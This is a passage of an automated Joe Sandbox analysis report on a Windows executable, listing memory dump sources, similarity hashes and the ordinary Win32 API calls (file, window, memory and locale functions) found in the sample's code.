                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 2018770650-0
                                                                              • Opcode ID: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
                                                                              • Instruction ID: 56c29436b3704a60aac7ef2d45938277689dd37fb147f6dcc6f0601c7006ef02
                                                                              • Opcode Fuzzy Hash: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
                                                                              • Instruction Fuzzy Hash: 59F0C872A04644ABCB00DF75AC416AEB7E8DB4831575149B7FC04E3262E7385E189598
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452179
                                                                              • GetLastError.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452181
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 1799206407-0
                                                                              • Opcode ID: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                              • Instruction ID: 62be775e20b856c612f09eeab74c149225b5b58071cf0ad503393caa7686f059
                                                                              • Opcode Fuzzy Hash: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                              • Instruction Fuzzy Hash: 2BF02870A04B08ABDB10DF759C414AEB3E8EB4572571047B7FC14A3282D7785E088588
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045CEF2), ref: 0045D046
                                                                              Strings
                                                                              • bzlib: Too much memory requested, xrefs: 0045D021
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID: bzlib: Too much memory requested
                                                                              • API String ID: 4275171209-1500031545
                                                                              • Opcode ID: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                              • Instruction ID: abed268314e6f1e5b27342288b91a972118d83a3dc427804377a042ebfa3a805
                                                                              • Opcode Fuzzy Hash: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                              • Instruction Fuzzy Hash: 87F030327001114BDB6199A988C17DA66D48F8875EF080476AF4CDF28BD6BDDC89C36C
                                                                              APIs
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                              • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CursorLoad
                                                                              • String ID:
                                                                              • API String ID: 3238433803-0
                                                                              • Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                              • Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
                                                                              • Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                              • Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLibraryLoadMode
                                                                              • String ID:
                                                                              • API String ID: 2987862817-0
                                                                              • Opcode ID: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                              • Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
                                                                              • Opcode Fuzzy Hash: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                              • Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928
                                                                              APIs
                                                                              • GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
                                                                              • GetClassInfoA.USER32(00000000,?,?), ref: 00416301
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ClassInfo
                                                                              • String ID:
                                                                              • API String ID: 3534257612-0
                                                                              • Opcode ID: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
                                                                              • Instruction ID: 0adfc10981bdfd058f0d6bb489ac923dd3d4ff6eaebe16c9951958678d3e783c
                                                                              • Opcode Fuzzy Hash: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
                                                                              • Instruction Fuzzy Hash: 50E01AB26025256AEB10DFA98D81EE32ADCDB09310B120263BE04CA286D764DD009BA8
                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF6E
                                                                              • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF76
                                                                                • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FilePointer
                                                                              • String ID:
                                                                              • API String ID: 1156039329-0
                                                                              • Opcode ID: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                              • Instruction ID: 1dbdaa83cb3dbbf4f1378df278a55a8d47ec78cb15146b3f417e0b56a3c3e3df
                                                                              • Opcode Fuzzy Hash: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                              • Instruction Fuzzy Hash: E2E012B13056015BFB00EAA599C1F3B22D8DB49314F10487BB544CF182E674CC098B65
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocLock
                                                                              • String ID:
                                                                              • API String ID: 15508794-0
                                                                              • Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                              • Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
                                                                              • Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                              • Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 2087232378-0
                                                                              • Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                              • Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
                                                                              • Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                              • Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                                • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                                • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: DefaultInfoLoadLocaleStringSystem
                                                                              • String ID:
                                                                              • API String ID: 1658689577-0
                                                                              • Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                              • Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
                                                                              • Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                              • Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98
                                                                              APIs
                                                                              • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: InfoScroll
                                                                              • String ID:
                                                                              • API String ID: 629608716-0
                                                                              • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                              • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                                              • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                              • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                              APIs
                                                                                • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                • Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                              • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B526,?,00000000,?,?,0046B733,?,00000000,0046B772), ref: 0046B50A
                                                                                • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                                • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                                              • String ID:
                                                                              • API String ID: 390483697-0
                                                                              • Opcode ID: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                              • Instruction ID: 01ed1b7c575f4ace7d1103a0bc1ae6f252d8ead66db9bed0bf215ba1be387fc5
                                                                              • Opcode Fuzzy Hash: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                              • Instruction Fuzzy Hash: 09F059B0244300BFE7109B32FC16B6677E8D709708F90443BF400C25C0E3794880C9AE
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                              • Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
                                                                              • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                              • Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58
                                                                              APIs
                                                                              • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                              • Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
                                                                              • Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                              • Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                              • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                              • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                              • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452085,00000000,004520A6,?,00000000), ref: 0042CCC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                              • Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
                                                                              • Opcode Fuzzy Hash: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                              • Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE64
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                              • Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
                                                                              • Opcode Fuzzy Hash: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                              • Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9
                                                                              APIs
                                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FormatMessage
                                                                              • String ID:
                                                                              • API String ID: 1306739567-0
                                                                              • Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                              • Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
                                                                              • Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                              • Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E
                                                                              APIs
                                                                              • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                              Memory Dump Source
